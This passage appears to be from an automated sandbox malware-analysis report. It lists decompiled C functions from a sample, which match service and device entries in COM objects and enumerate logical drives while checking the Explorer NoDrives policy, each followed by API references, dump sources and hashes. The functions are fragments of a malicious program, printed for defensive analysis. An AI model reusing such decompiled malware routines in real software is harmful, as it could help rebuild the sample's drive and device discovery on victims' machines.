                                                                                                                                                                                                                                                                                    								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                                    								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                                    								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                                    								E0040DEB0(_t49);
                                                                                                                                                                                                                                                                                    								return _t49;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x0040df91
                                                                                                                                                                                                                                                                                    0x0040df96
                                                                                                                                                                                                                                                                                    0x0040df9b
                                                                                                                                                                                                                                                                                    0x0040dfa4
                                                                                                                                                                                                                                                                                    0x0040dfa8
                                                                                                                                                                                                                                                                                    0x0040dfaa
                                                                                                                                                                                                                                                                                    0x0040dfb0
                                                                                                                                                                                                                                                                                    0x0040dfb5
                                                                                                                                                                                                                                                                                    0x0040dfb7
                                                                                                                                                                                                                                                                                    0x0040dfbf
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcd
                                                                                                                                                                                                                                                                                    0x0040dfce
                                                                                                                                                                                                                                                                                    0x0040dfd6
                                                                                                                                                                                                                                                                                    0x0040dfe9
                                                                                                                                                                                                                                                                                    0x0040dfeb
                                                                                                                                                                                                                                                                                    0x0040dff0
                                                                                                                                                                                                                                                                                    0x0040e08d
                                                                                                                                                                                                                                                                                    0x0040e08e
                                                                                                                                                                                                                                                                                    0x0040e09c
                                                                                                                                                                                                                                                                                    0x0040dff6
                                                                                                                                                                                                                                                                                    0x0040dffb
                                                                                                                                                                                                                                                                                    0x0040e003
                                                                                                                                                                                                                                                                                    0x0040e009
                                                                                                                                                                                                                                                                                    0x0040e00f
                                                                                                                                                                                                                                                                                    0x0040e017
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040e083
                                                                                                                                                                                                                                                                                    0x0040e088
                                                                                                                                                                                                                                                                                    0x0040e08b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e03c
                                                                                                                                                                                                                                                                                    0x0040e040
                                                                                                                                                                                                                                                                                    0x0040e046
                                                                                                                                                                                                                                                                                    0x0040e04c
                                                                                                                                                                                                                                                                                    0x0040e050
                                                                                                                                                                                                                                                                                    0x0040e056
                                                                                                                                                                                                                                                                                    0x0040e060
                                                                                                                                                                                                                                                                                    0x0040e066
                                                                                                                                                                                                                                                                                    0x0040e070
                                                                                                                                                                                                                                                                                    0x0040e076
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040dfd8
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040df9e
                                                                                                                                                                                                                                                                                    0x0040dfa1
                                                                                                                                                                                                                                                                                    0x0040dfa1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E49B,00000000), ref: 0040DFAA
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E49B,00000000), ref: 0040DFCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4bbc681d7c9b78df020861981114938a0f21831a1cbc421abd2649154505d8b2
                                                                                                                                                                                                                                                                                    • Instruction ID: 788f702b9492d2748fa33cb2f0bef3e81c848d8eff2aac60f157a8f848454262
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbc681d7c9b78df020861981114938a0f21831a1cbc421abd2649154505d8b2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC31D472601615ABC710AFB5EC88BD7B7E8FF44724F00893EF54AD3281DB39A4448B99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C741() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x0040c750
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7b3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7c6
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c803
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81b
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c825
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c833
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c83d
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c845
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction ID: a2ae9d540b18a7237781164838fed95b9af08367ec0547399f69e9a392117d82
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631CA75E0020ADFCB04DF98D884BAFB7B5AF88305F108669E515A7390D7789A85CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C921() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x0040c930
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c993
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9a6
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9e3
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9fb
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca05
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca13
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca1d
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca25
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 13aee1176452d62b74ac46d26b233db62756319b53bb87b3b8849ed906738a0f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31C974E0020ADBCB14CF99D894BAFB7B5AF88304F108269E515B7390D7789A85CF94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404CB0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				int _v36;
                                                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                    				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				while(_v24 < 2) {
                                                                                                                                                                                                                                                                                    					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 4;
                                                                                                                                                                                                                                                                                    						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						RegCloseKey(_v28);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x00404cbc
                                                                                                                                                                                                                                                                                    0x00404cbf
                                                                                                                                                                                                                                                                                    0x00404cc6
                                                                                                                                                                                                                                                                                    0x00404ccd
                                                                                                                                                                                                                                                                                    0x00404cd4
                                                                                                                                                                                                                                                                                    0x00404ce6
                                                                                                                                                                                                                                                                                    0x00404d0c
                                                                                                                                                                                                                                                                                    0x00404d0e
                                                                                                                                                                                                                                                                                    0x00404d15
                                                                                                                                                                                                                                                                                    0x00404d39
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404d61

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00404D04
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00404D28
                                                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404CF7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
